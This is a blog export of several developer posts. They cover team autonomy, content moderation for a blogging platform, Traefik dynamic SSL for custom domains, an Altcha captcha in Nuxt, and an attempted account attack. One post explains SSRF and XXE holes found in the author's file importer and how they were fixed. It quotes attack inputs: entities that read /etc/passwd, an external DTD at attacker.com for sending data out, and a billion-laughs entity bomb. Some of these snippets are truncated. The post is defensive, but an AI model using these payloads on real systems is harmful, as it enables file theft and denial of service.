had in mind, too bad but you have to commit to this decision. This is the famous "disagree and commit" . And that doesn't take anything away from team autonomy. Teams can be the driving force behind initiatives to solve a given problem, but in the end, we'll be looking for alignment. Otherwise, we're back in the bottom right quadrant. If your aim is to create more autonomous product teams, you may come up against the following difficulties: These 3 subjects create deadlocks. A good PM and/or Tech Leader will be reluctant to join an organization where he/she feels a lack of autonomy. Management will find it hard to trust a team that they don't feel is business-oriented enough. Top management who don't have confidence in a team will continue to demand a high degree of predictability in development via detailed roadmaps. As a Tech Leader, you have your hands on several levers that I've already covered in the first chapters: The aim of all these actions is to increase the trust placed in Engineering's actions. This confidence will be transformed into the delegation of autonomy . Would you say that you have all the constraints in mind for your current projects? How much time do you spend explaining the context to the people who work with you? What is your team/department's objective for the year? How are you contributing to this objective this quarter? an empowered team's mission is to work on acquiring new users a "feature team" has to come up with a sponsorship program an "empowered team" is tasked with improving the developer experience by reducing dev cycle times a feature team is tasked with implementing a new CI (continuous integration) solution. avoiding the construction of unnecessarily complex solutions, demonstrating a misunderstanding of objectives checking that these priorities are built with the right constraints in mind ensuring that these priorities contribute to the group's objectives. the person seeking to develop his or her group's autonomy the person who belongs to a group with limited autonomy, and is seeking to gain independence. reaction-only teams, i.e. whose work is driven by support and bugs, upgrades to end-of-life components, and so on. no hyper-clear objectives, but a kanban (a big todo list) that feeds itself organically micromanagement, with tasks assigned by a manager/project leader a technical team that works in isolation from users, often in supplier mode for a team that defines the product, but itself far from the business. several groups work on defined topics, but without collaboration with other teams. a large number of projects are underway, stretching out over months. This is linked to the "one-man army" phenomenon: if a single person can move fast, he or she ends up burning out faster than a larger group. This slowness makes teams weary, as they continue to pile new subjects on top of the list. the multiplicity of topics creates vagueness throughout the organization, which becomes a black box for the rest of the company the perceived impact is low The sales department will invest to open a sales office in the USA. The finance department will open a subsidiary in the USA and modify its invoicing model to comply with current regulations. The engineering department will study how to reduce product latency through a better geographical distribution of its infrastructure the leader is the most experienced member of the group, with a significant gap between them there is a strong imbalance between junior and senior staff, to the detriment of the latter the team is not involved in decision-making, and the backlog is fed by a single person the people I work with don't make the right decisions or don't know how to make decisions, so I step in to make them for them for the sake of speed I don't spend much time on the explanation the people in question end up concentrating more on their expertise than on decision-making. Develop your business understanding . You need to step outside the team to better understand the challenges and constraints of the company and/or your customers. Develop your decision-making skills. To re-establish the symmetry of exchanges with your management, you need to keep one thing in mind: you need to provide more solutions than problems . You won't be trusted if you only come up with problems to solve, and your discussions will systematically turn into basic reporting, so you'll have to make choices. Team A works on improving SEO through multi-domain management and regionalization. Team B sets up several new domain names for multi-domain management Team C works on SEA to refine geographic targeting of campaigns. Team A works on a sponsorship program Team B works on sharing mechanisms on social networks Team C works on affiliation mechanisms The objective is defined in advance. Teams propose initiatives to contribute to it After discussion, a set of initiatives is chosen. in OKR via the OKR Quarterly review fixing appetites in the ShapeUp method the construction of "bet boards" by Henrik Kniberg Program Increment Planning in SAFe recruitment. To get started, you need very good PMs and Tech leaders who have an entrepreneurial mindset as well as a technical one. Transformation is all about people. top management buy-in and a change of mindset are essential. They must agree to delegate the "how" to product teams, and focus on the "what" (objectives). And that's a lot harder than it sounds. Many say they want to move to autonomous product teams, but are very frustrated at not being able to tell them what to do agreeing to abandon traditional roadmaps in favor of strategies based on objectives (OKR or other, it doesn't matter). Develop your understanding of the business Measuring everything Know how to prioritize Create time for ideation Know how to communicate Give away your legos and other commandments for scaling startups No rules rules keynote from Henrik Kniberg en 2016 Empowered from Marty Cagan

0 views
Hugo 2 months ago

Is Platform Moderation Doomed to Fail?

I've recently been building a blogging platform, writizzy.com , with the ambition of offering a European alternative to US platforms like Medium, Substack, Hashnode, and others. Now you might be thinking, "Aren't blogs kind of dead since YouTube, TikTok, Instagram came along?" I don't think so, but I'll get back to that. However, blogs do have one major weakness compared to all those platforms: discoverability. What makes these platforms successful is... their content recommendation algorithms. Yes, I know—that's also what we criticize them for. But without algorithms, nobody would ever discover Mike's video about his passion for ant-keeping. And that might be a shame. The thing is, recommendation comes with platform responsibility for suggested content, which means moderation. And so far, no platform has nailed this. Between YouTube's puritanical overzealousness, X's normalization of conspiracy theories, and Shein selling questionable products, it's clear this problem is far from solved. So what do we do? Is it doomed to fail? In this post, I'll cover the health of blogs, why discoverability matters, different approaches to discovery, content recommendation platforms, and moderation. Fair warning: I don't have all the answers—I'm actively working through this myself. But that's exactly why I'd love to discuss it. Surprise: blogs are actually thriving. According to OptinMonster, there are over 600 million blogs worldwide. More than 409 million people read over 20 billion pages monthly on wordpress.com alone, with WordPress still powering 40% of all websites. Another source claims that 83% of internet users (4.4 billion people) regularly read blog posts . So blogging is very much alive, though there's definitely been a shift toward video consumption. Today, 82% of global internet traffic is video, and many people now turn to TikTok, Instagram, and similar platforms for quick answers—whether it's recipes, DIY tutorials, or even tech topics. That said, written content has clear advantages: it's easier to create and update. I do both—videos and blog posts. Writing is obviously much faster than producing a video, plus I can update an article after publishing, which I can't do with a video. That's a significant advantage for people who don't have the energy to film themselves, or simply don't want to show their face. Yes, video will keep dominating entertainment and "brain off" moments, but blogs will remain more accessible and better suited for specialized, easily-updated content. However—and this is where video platforms win—the big difference is content recommendation. And that's what makes the blog model fragile. Discoverability is a broad topic, because the first question is: does it even matter when you're writing a blog? For some, the answer is clearly yes—people who've built media outlets, paid newsletters, and monetize their traffic. Examples: Pragmatic Engineer , Ali Abdaal . At the other end of the spectrum, it's purely personal—a journal where whatever happens, happens. Discoverability might even be actively discouraged, like n.survol.fr which publishes no sitemap and makes site exploration intentionally difficult. And between these extremes lies a whole spectrum: people working on personal branding (so 2010s), others using blogs for influence, weekend hobbyist bloggers, etc. I'm somewhere in that gray zone. I don't monetize my blog, which I've been running since 2001, but I'll admit I'd find it a bit sad if nobody read it. So I pay attention. Even though I use it as a kind of personal digital memory, my original motivation back in the early 2000s was sharing tutorials and experiences. And if absolutely nobody reads them, I'd probably put in less effort. That's precisely why I added YouTube videos a year ago—to scale up. I understand this isn't everyone's goal, but personally, I'm trying to have an impact—at my own scale—on understanding tech topics and their influence on business and society. I'm not selling anything; I'm trying to contribute something. Here's the thing: when I post a YouTube video, I average several thousand views, with my personal best at 35K so far. (For example: as I write this, I published a video this morning and it already has 3.6K views in under 7 hours.) On the blog, views range from 50 to 12 000, with most posts hovering around 1K. And that's for an established blog with decent domain authority and reasonable SEO—these aren't even bad numbers. Again, maybe some people are totally against tracking these "vanity metrics," but I won't pretend I'm not competitive, and I'd bet some blogs would be more active if they were more widely read. When content isn't read, it's not necessarily because it's bad—it's because it's hard to find. Without active promotion, nobody reads a blog post. SEO for individual bloggers is a nearly lost battle against platforms and professional sites with better authority or marketing budgets. That's why 90% of bloggers use social media to promote their posts. And naturally, while building Writizzy, I'm wondering: what if we could do better? What if we could enable content discovery through a community of readers? This is exactly where platforms come in. Instagram, YouTube, TikTok, X—they all work the same way. They create personalized content feeds, trying to maximize time spent on the platform by continuously serving content tailored to each user. The idea is to leverage content produced by all users to determine the right audience for any new video. When I publish on YouTube, I make zero promotional effort—YouTube handles it. It identifies the right audience, shows them the video, measures reactions (clicks, watch time, likes, comments, etc.), validates the audience, and repeats. That's what we call an algorithm. But these algorithms have plenty of flaws. They can be optimized to favor negative engagement (like X, which amplifies controversial content), or even favor certain political viewpoints (X again, implicated in several recent election interference cases). They're also criticized for creating filter bubbles that trap us in belief patterns—though I'd argue our own confirmation biases already do that on their own. They can also lock us into infinite scrolling, rewarded by small dopamine hits, while we passively accept ads scattered throughout. Yes, algorithms have a bad reputation, but in practice, they're the main reason we stay on these platforms. They let us discover available content, and for creators, they're what prevents total anonymity. If I'm convinced discoverability matters for blogs, one question emerges: how do we give control back to users? Before going further, I should note that not all algorithms are opaque and complex. There are "lightweight" alternatives, like Hacker News, which ranks purely by vote count and freshness. Bearblog uses the same approach, displaying its formula at the bottom of the page: Other solutions offer simple chronological sorting. That's Mastodon's approach—posts sorted purely by date. I find this too minimalist. What really interests me is whether there's a virtuous approach. How do we preserve recommendation quality without imposing unilateral choices? This is exactly what this blog post addresses, making an important observation: You can pay money and advertise to women of color between 40–60 in Seattle, but you can't choose to read perspectives from those women The post highlights a solution, an MIT research project: Gobo (unfortunately inactive as I write this), which lets you aggregate data from platforms and apply your own filters. Similar projects include Youchoose and Tournesol , all sharing the same goal: empowering users. While these initiatives remain niche, the most polished and widely-used implementation is probably Bluesky, which lets anyone choose algorithms that can be created by other users . If I were to build a content recommendation system for Writizzy, this would be the approach that appeals to me most. However, discussing this with Thomas (who also works on Writizzy), offering a content feed quickly raises two other problems: I'll skip the first topic—it's not what this post is about. But the second is serious. The moment you create a page aggregating content from multiple users, the risk of inappropriate content exists. It could be adult content, spam, scams, racist abuse, etc. Writizzy already has responsibilities under the European DSA (Digital Services Act). I must provide a reporting mechanism and act on reports of illegal content. Note: as a host, I'm not required to proactively monitor—only to respond to reports. As long as blogs remain separate, it's still manageable. Impact is limited to the individual's blog. But once a feed exists, impact multiplies—that's the whole point—but it also creates more pressure on moderation. And it's far from simple, because you have to judge whether content is illegal, and that judgment isn't always clear-cut. What's acceptable varies. Where's the line between satire and insult? Between political criticism and defamation? How do you detect and handle fake news? What's the line between pornographic nudity and art (Courbet's L'Origine du monde , for instance)? I've tried to catalog different moderation methods to see what might work for Writizzy: Two main categories here: manual moderation by one or more super-admins, and mass outsourced moderation. Small-scale manual moderation is what you see on Mastodon, with the obvious bias of moderator subjectivity and resulting conflicts between instances with different political positions. I'm not infallible; I don't want to be responsible for moderating all published content. And it won't scale. Then there's mass moderation, often outsourced to low-wage countries by major platforms like Meta, TikTok, or OpenAI . It's far from pleasant work, and abuses have been documented extensively . It's unsuitable for Writizzy—economically and ethically. This relies mainly on user reports. X's Community Notes fall into this category, as do Wikipedia's discussion threads. It's obviously the cheapest approach, but it can be gamed if groups coordinate to censor content. This system can be improved with reputation points awarded by the community. That's Reddit and Hacker News Karma, or Stack Overflow reputation scores. This mechanism could make sense for Writizzy. However, community moderation is reactive—meaning the damage is done; content has already been exposed before being flagged. This can involve keyword detection, user profiling (new accounts, posting patterns, etc.), or nudity detection algorithms for images. It's the easiest method to implement. You can adjust tolerance levels. This is where AI could shine for understanding text, but it's far from foolproof—people use word substitutions, altered spelling, emojis representing concepts, or algorithms simply perform worse in certain languages. My conclusion from this mini-study is fairly obvious: you'd need automated detection upfront, then a reporting system enhanced by Karma scores downstream, and finally manual super-admin intervention as a last resort. Yet these systems exist and platforms are still criticized, because all moderation is imperfect. There's always the central question of interpretation: what's legal or not? And that interpretation varies by country and culture. This brings us to another approach—Bluesky's again—where one of the fundamental principles is decentralization, including moderation via labelers . Bluesky's moderation has two levels: Once again, it comes back to the same idea: giving users control. (Even if 90% will probably keep the default settings.) What's certain is that this topic is complex, and I completely understand Thomas's reluctance to venture into it. So we discussed other approaches. Rather than aggregating content, we could start with content curation. It's much simpler—we could manually select content to highlight each week or month. We could also consider smaller-scale recommendations: Or we could focus on automating cross-posting: RSS and newsletters today, automatic distribution to ATProto, Bluesky, Nostr tomorrow? There are other possibilities, and no decisions have been made yet. What would you do? If discoverability matters to you, what would be your ideal solution? Do you use Medium's or dev.to 's recommendations? Are you already cross-posting to federated networks? How do you start with only 140 users, of which maybe 10-15% are truly active? This is called the Cold Start problem. Moderation. Base moderation, handled by Bluesky itself. This first layer uses Ozone, an open-source moderation tool . It's configurable so users can set their own tolerance levels. This step catches universally unacceptable content (child abuse, incitement to violence, etc.) for which the platform can be held legally responsible. Optional moderation provided by independent labelers. These labelers can be built with an SDK and offered to users who choose them to customize their expected moderation. Related content suggestions at the bottom of articles Similar newsletter suggestions when users subscribe

0 views
Hugo 2 months ago

Managing Custom Domains and Dynamic SSL with Coolify and Traefik

I recently published an article on [managing SSL certificates for a multi-tenant application on Coolify](https://eventuallymaking.io/p/2025-10-coolify-wildcard-ssl). The title might sound intimidating, but basically it lets an application handle tons of subdomains (over HTTPS) dynamically for its users. For example: - `https://hugo.writizzy.com` - `https://thomas-sanlis.writizzy.com` That's a solid foundation, but users often want more: **custom domains**. The ability to use their own address, like: - `https://eventuallymaking.io` - `https://thomas-sanlis.com` So let's dive into how to manage custom domains for a multi-tenant app with dynamic SSL certificates. *(I feel like I'm going for the world record in longest blog post title!)* ## Custom Domains The first step for a custom domain is routing traffic from that (sub)domain to your application (Writizzy in my case). It all comes down to **DNS records** on the user's side. Only they can configure their domain to point to your application's subdomain. They have several options: **CNAME**, **ALIAS**, or **A** records. ### 1. CNAME (the simplest) A CNAME is an alias for another domain. It basically says that `www.eventuallymaking.io` is an alias for `hugo.writizzy.com`. All traffic trying to resolve the `www` address gets automatically forwarded to your application domain. **Major limitation:** You can't use a CNAME for a root domain (e.g., `eventuallymaking.io` without the `www`). Adding a CNAME on an apex domain would conflict with other records (A, MX, TXT, etc.). ### 2. ALIAS Some DNS providers offer **ALIAS** records (or *CNAME flattening*). It's essentially a CNAME that can coexist with other records on a root domain. Great option if the user's provider supports it (OVH doesn't, for instance). ### 3. A Record Here, the user directly enters Writizzy's server IP address. **Warning:** This approach is risky. If you change servers (and therefore IPs), all your users' custom domains break until they update their config. To use this method safely, you need a **floating IP** that can be reassigned to your new server or web frontend. Alright, that's a good start, but if we stop here, things won't work well—the site won't serve over HTTPS. ## HTTPS on Custom Domains In my previous post, I showed how Traefik could route all traffic hitting `*.writizzy.com` subdomains to the same application using these lines: ```yaml traefik.http.routers.https-custom.rule=HostRegexp(`^.+$`) traefik.http.routers.https-custom.entryPoints=https traefik.http.routers.https-custom.service=https-0-zgwokkcwwcwgcc4gck440o88 traefik.http.routers.https-custom.tls.certresolver=letsencrypt traefik.http.routers.https-custom.tls=true traefik.http.routers.https-custom.priority=1 ``` Since the regex catches everything, you might think SSL would just follow along. Unfortunately, no. Traefik knows it needs to handle a wildcard certificate for `*.writizzy.io`, but it has no clue about the external domains it'll need to serve. We need to help it by dynamically providing the list of custom domains. Our constraints: - Obviously, no application restart - We want to drive it programmatically ### Dynamic Traefik Configuration with File Providers This is where Traefik's [File Providers](https://doc.traefik.io/traefik/reference/install-configuration/providers/others/file/) come in. In Coolify, this feature is enabled by default via [dynamic configurations](https://coolify.io/docs/knowledge-base/proxy/traefik/dynamic-config). Under the hood, Traefik watches a specific directory: ```bash - '--providers.file.directory=/traefik/dynamic/' - '--providers.file.watch=true' ``` Drop a `.yml` file defining the rule for a new domain, and Traefik picks it up hot and triggers the HTTP challenge with Let's Encrypt to get the SSL certificate. **Example dynamic configuration:** ```yaml http: routers: eventuallymaking-https: rule: "Host(`eventuallymaking.io`)" entryPoints: - https service: https-0-writizzy tls: certResolver: letsencrypt priority: 10 eventuallymaking-http: rule: "Host(`eventuallymaking.io`)" entryPoints: - http middlewares: - redirect-to-https@docker service: https-0-writizzy priority: 10 ``` So with this approach, we've solved our first constraint: no restart needed to configure a new custom domain. Now let's tackle the second one and make it programmatic. ### Automation via the Application The idea is straightforward: the application creates these files directly in the directory Traefik watches. 1. **Coolify configuration:** Go to `Configuration -> Persistent Storage` and add a `Directory mount` to make the `/traefik/dynamic/` directory visible to your application container. ![directory mount](https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1765961966661-wymdzej.png) 1. **Code (Kotlin in my case):** The application generates a file based on the template above as soon as a user configures their domain. > **Important note on timing:** If you create the Traefik config before the user has pointed their domain to your IP, the SSL challenge will fail. Traefik will automatically retry (with backoff), but it can take a while. Ideally, validate the DNS pointing (via a background job) **before** generating the file. > **Important note on security:** The generated file contains user input (the domain name). It's crucial to sanitize and validate this data to prevent a malicious user from injecting arbitrary Traefik directives into your configuration. ## Wrapping Up This post wraps up what I hope has been a useful series for SaaS builders running multi-tenant apps on Coolify. We've covered: 1. [Tenant management (Nuxt) and basic Traefik configuration](https://eventuallymaking.io/p/2025-10-coolify-subdomain) 2. [SSL management with dynamic subdomains](https://eventuallymaking.io/p/2025-10-coolify-wildcard-ssl) 3. **Custom domains with SSL** (this post) You might wonder if this solution scales with tens of thousands of sites all using custom domains—specifically whether Traefik can handle monitoring that many files in a directory. I don't have the answer yet. Writizzy is nowhere near that scale for now. There might be other solutions, like using Caddy instead of Traefik in Coolify, but it's way too early to explore that.

0 views
Hugo 2 months ago

Implementing a tracking-free captcha with Altcha and Nuxt

For the past few days, I've noticed several suspicious uses of my contact form. Looking closer, I noticed that each contact form submission was followed by a user signup with the same email and a name that always followed the same pattern: qSfDMiWAiLnpYYzdCeCWd fePXzKXbAmiLAweNZ etc... Let's just say their membership in the human species seems particularly dubious. Anyway, it's probably time to add some controls, and one of the most famous is the captcha. ## Next-generation captchas Everyone knows captchas – they're annoying, probably on par with cookie consent banners. Nowadays we see captchas where you have to identify traffic lights, solve additions, drag a puzzle piece to the right spot, and so on. But you may have noticed that lately we're also seeing simple forms with a checkbox: "I am not a robot". ![I'm not a robot](https://writizzy.b-cdn.net/blogs/48b77143-02ee-4316-9d68-0e6e4857c5ce/1764749254941-124yicj.jpg) Sometimes the captcha isn't even visible anymore, with detection happening without asking you anything. So how does it work? And how can I add it to my application? ## Nuxt Turnstile, the default solution with Nuxt In the Nuxt ecosystem, the most common solution is [Nuxt turnstile](https://nuxt.com/modules/turnstile). The documentation is pretty clear on how to add it. It's a great solution, but it relies on [Cloudflare turnstile](https://nuxt.com/modules/turnstile), and I'm trying to use only european products for Writizzy and Hakanai. Still, the documentation helps understand a bit better how next-generation captchas work. When the page loads, the turnstile widget performs client-side checks: - **proof of space: **The script asks the client to generate and store an amount of data according to a predefined algorithm, then asks for the byte at a given position. Not only does this take time, but it's difficult to automate at scale. - **trivial browser detections:** The idea is to try to detect a bot (no plugins, webdriver control, etc.). Fingerprinting also helps in this case. It collects all available info about the browser, OS, available APIs, resolution, etc. Note that fingerprinting can be frowned upon by GDPR, which may consider it as uniquely identifying a person. Personally, I find that debatable, but in the context of anti-spam protection, we're kind of chasing our tail here since it would be necessary to ask bots for their permission to try to detect them. We're at the limits of absurdity here. But let's continue. Based on the previous info, the script sends all this to Cloudflare. Based on this info and relying on a huge database of worldwide traffic, Cloudflare calculates a percentage chance that the user is a bot. The form will vary between: - nothing to do, Cloudflare is convinced it's a human - a checkbox "I am not a robot" - a more elaborate captcha if the suspicion is really strong - a blocking page when there's no doubt about the suspicion Now, you might say, the checkbox is a bit light, isn't it? If I've gotten this far, I can easily automate a click on a checkbox. Especially since Cloudflare is everywhere, it's necessarily the same form everywhere. Yes... But... First, the way you check the box will be analyzed. Is the click too fast, does it seem automated, is the mouse path to reach the box natural? All this can trigger additional protection. *EDIT: Turnstile might not do this operation. reCaptcha, Google's solution, is known for doing it. Turnstile is less explicit on the subject.* But on top of that, the checkbox triggers a challenge, a small calculation requested by Cloudflare that your client must perform. The result is what we call a **proof of work**. This work is slow for a computer. We're talking about 500ms, an eternity for a machine. For a human user, it's totally anecdotal. And the satisfaction of having proven their humanity makes you forget those 500 little milliseconds. On the other hand, for a bot, this time will be a real problem if it needs to automate the creation of hundreds or thousands of accounts. So it's not impossible to check this box, but it's costly. And it's supposed to make the economic equation uninteresting at high volumes. Now, even though all this is nice, I still don't want to use Cloudflare, so how do I replace it? ## Altcha, an open-source alternative During my research, I came across [altcha](https://altcha.org/). The solution is open source, requires no calls to external servers, and shares no data. The implementation requires requesting the Proof of Work (the famous JavaScript challenge) from your server. Here we'll initiate it from the Nuxt backend, in a handler: typescript ```typescript // server/api/altcha/challenge.get.ts import { createChallenge } from 'altcha-lib' export default defineEventHandler(async () => { const hmacKey = useRuntimeConfig().altchaHmacKey as string return createChallenge({ hmacKey, maxnumber: 100000, expires: new Date(Date.now() + 60000) // 1 minute }) }) ``` In the contact form page, we'll add a Vue component: vue ```vue ``` This `altchaPayload` will be added to the post payload, for example: typescript ```typescript await $fetch('/api/contact', { method: 'POST', body: { email: loggedIn.value ? user.value?.email : event.data.email, subject: event.data.subject, message: event.data.message, altcha: altchaPayload.value } }) ``` The calculation result will then be verified in the `/api/contact` endpoint typescript ```typescript const hmacKey = useRuntimeConfig().altchaHmacKey as string const ok = await verifySolution(data.altcha, hmacKey) if (!ok) { throw createError({ statusCode: 400, message: 'Invalid challenge' }) } ``` The Vue component I mentioned earlier is this one: vue ```vue ``` And there you go, the [contact page](https://pulse.hakanai.io/contact) and the [signup page](https://pulse.hakanai.io/signup) are now protected by this altcha. Now, does it work? ## Altcha's limitations The implementation was done yesterday. And unfortunately, I'm still seeing very suspicious signups on Pulse. So clearly, Altcha didn't do its job. However, now that we know how it works, it's easier to understand why it doesn't work. Altcha doesn't do any of the checks that Turnstile does: - no proof of space - no fingerprinting - no fingerprint verification with Cloudflare - no behavioral verification of the mouse click on the checkbox. The only protection is the proof of work, which only costs the attacker time. Now for Pulse, for reasons I don't understand, the person having fun creating accounts makes about 4 per day. The cost of the proof of work is negligible in this case. So Altcha is not suited for this type of "slow attack". Anyway, I'll have to find another workaround... And I'm open to your suggestions.

0 views
Hugo 3 months ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message: > Huge vuln on writizzy > > Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd Basically, you absolutely need to validate the images from the Medium HTML! > > Your /etc/passwd as proof: > > Micka Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities. ## The SSRF Vulnerability SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page: ```html ``` I need to download the image, then re-upload it to Bunny. During the conversion to markdown, I'll then write this: ```markdown ![](https://cdn.bunny.net/blog/12132132/image.jpg) ``` So to do this, at some point I open a URL to the image: ```kotlin val imageBytes = try { val connection = URL(imageUrl).openConnection() connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 connection.getInputStream().use { it.readBytes() } } catch (e: Exception) { logger.warn("Failed to download image $imageUrl: ${e.message}") return imageUrl } ``` Then I upload the byte array to Bunny. Okay. But what happens if the user writes this: ```html ``` The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.: ```html ``` The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used: ```kotlin if (url.protocol !in listOf("http", "https")) { logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl") return imageUrl } ``` Then, verify that we're not attacking private URLs: ```kotlin val host = url.host.lowercase() if (isPrivateOrLocalhost(host)) { logger.warn("Blocked private/localhost URL: $imageUrl") return imageUrl } ... private fun isPrivateOrLocalhost(host: String): Boolean { if (host in listOf("localhost", "127.0.0.1", "::1")) return true val address = try { java.net.InetAddress.getByName(host) } catch (_: Exception) { return true // When in doubt, block it } return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress } ``` But here, I still have a risk. The user can write: ```html ``` And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests: ```kotlin val connection = url.openConnection() if (connection is java.net.HttpURLConnection) { connection.instanceFollowRedirects = false } connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode if (responseCode in listOf(301, 302, 303, 307, 308)) { logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)") return imageUrl } ``` Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka: > You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :) ## The XXE Vulnerability XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to: - Read local files (/etc/passwd, config files, SSH keys...) - Perform SSRF (requests to internal services) - Perform DoS (billion laughs attack) Micka modified the WordPress XML file to add an entity declaration: ```xml ]> ... &xxe; ``` This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly: ```xml %dtd; ]> ``` And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd): ```xml "> %all; ``` Finally, to crash a server, the attacker could also have done this: ```xml ]> &lol9; 1 publish post ``` This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea. We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities: ```kotlin val factory = DocumentBuilderFactory.newInstance() // Disable external entities (XXE protection) factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) factory.setFeature("http://xml.org/sax/features/external-general-entities", false) factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false) factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false) factory.isXIncludeAware = false factory.isExpandEntityReferences = false ``` I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.

0 views
Hugo 3 months ago

Someone tried to hack me

Writizzy is barely two weeks old. Last week, I faced my first Black Hat attack. It wasn't a Bug Bounty probe; it was a **malicious attempt to delete production data**. This is how I detected and remediated the attack, and why this event cemented my philosophy of **'Pain in the Ass Driven Development'** for early-stage products. ## White Hat vs. Black Hat Why am I calling this a black hat attack? You might say, a hacker is a hacker, regardless of intent. However, there are nuances to consider. You have the **White Hats**, who test your site and then report the vulnerabilities they find. It's quite common to be contacted by white hats, who also expect some compensation. However, this remains risky because the legal framework is often unclear, and the researcher could get into trouble. Therefore, the vast majority of white hats work within legally framed **Bug Bounty programs** provided by companies. The secondary benefit of these programs is guaranteeing payment for the vulnerabilities found. Within the white hat category, there is a second group, often referred to as [beg bounty](https://www.troyhunt.com/beg-bounties/). These are often people who have industrialized basic checks on websites, finding often minor flaws, and randomly contact sites hoping for a reward. And then you have the **Black Hats**, with many different motivations: - **Data theft:** The goal is to resell the information elsewhere. - **Data destruction:** Driven by ideology, for fun, or for personal reasons. It is undoubtedly this last scenario that presented itself to us last week. The attacker attempted to delete articles specifically from the [thomas-sanlis.com](https://thomas-sanlis.com) blog, and only that one. ## Detection The attack took place on November 7th. I started receiving Sentry alerts regarding inconsistent usage, for example, **attempts to delete data that did not belong to the requesting author**. Since the application is a Nuxt SSR application, the client communicates with the backend via an API. The attacker attempted to directly exploit the API by replacing the identifiers used, which is known as an **IDOR (Insecure Direct Object Reference)** vulnerability or, more generally, **Broken Access Control**. Fortunately, the API performs numerous server-side checks, notably by verifying the session information and its consistency with the received request. I was able to investigate the traces to find the author and the target. The author created an account using a **disposable email address**. These mailboxes are frequently used to avoid leaving a trace. I’ll come back to how to prevent this later. The target was the blog of Thomas Sanlis. A bit later, the same person attempted to change their account email to use Thomas's, likely with the goal of logging into his account, given the first attack failed. ## Remediation Actions Writizzy was launched less than 2 weeks ago, so I hadn't yet implemented all the necessary protections. What was in place was enough to fend off the attack—hopefully, it's always hard to be 100% sure. But I knew certain parts needed to be more robust. I now have an arsenal of actions available: - **Account blocking**. - **Temporary blocking for brute force attacks** (temporary to prevent an attacker from also blocking all accounts they know are using the site). - **Rate limiting** on certain actions and per IP. I will also likely prohibit the use of disposable emails on the site. There are two main approaches for this: - Calling an external API to validate the email (e.g., [debounce.io](http://debounce.io), [emailable.com](http://emailable.com), [captainverify.com](), etc.). - Checking against an open-source list yourself. One of the best known seems to be: [disposable-email-domains](https://github.com/disposable-email-domains/disposable-email-domains), but this requires a regular and automated update mechanism for the list. ## Pain in the Ass Driven Development (PITADD) This reminded me of a previous company I created. Moderation did not exist until the day one person contacted 1,000 people at once overnight. We created a moderation feature the very next day to prevent it from happening again. It is always a question of timing. It's difficult to anticipate everything, and it's expensive, too. So there is always a **balance between cost and risk**. This balance changes depending on the context—if you work in the medical field, for example. But you cannot build a bunker on Day 1 for a non-critical site. Of course, a necessary minimum is required and some basic stuff are non-negotiable, especially regarding data protection. But the rest comes as risks increase, such as when the company grows. Here is my framework for risk arbitration (examples): - **Data theft** is critical. It must be anticipated on **Day 1**. - **Data loss** is important, but can be mitigated by backups. Implementation can be postponed a bit. - **Spam** is an annoyance. It can be handled manually as long as the volume remains low. etc... I categorize this arbitration as: **Pain in the Ass Driven Development.** This applies just as much to security, design, architecture, and so on. It's simply not possible to have the same level of maturity as a 10,000-person company from the start. You have to wait until it hurts, or until it risks hurting very badly. The trade-off is that you have to be responsive and have the right measurement tools in place (monitoring, alerts, logs, etc.), otherwise it's not a strategy, it's negligence.

0 views
Hugo 3 months ago

Being Opinionated

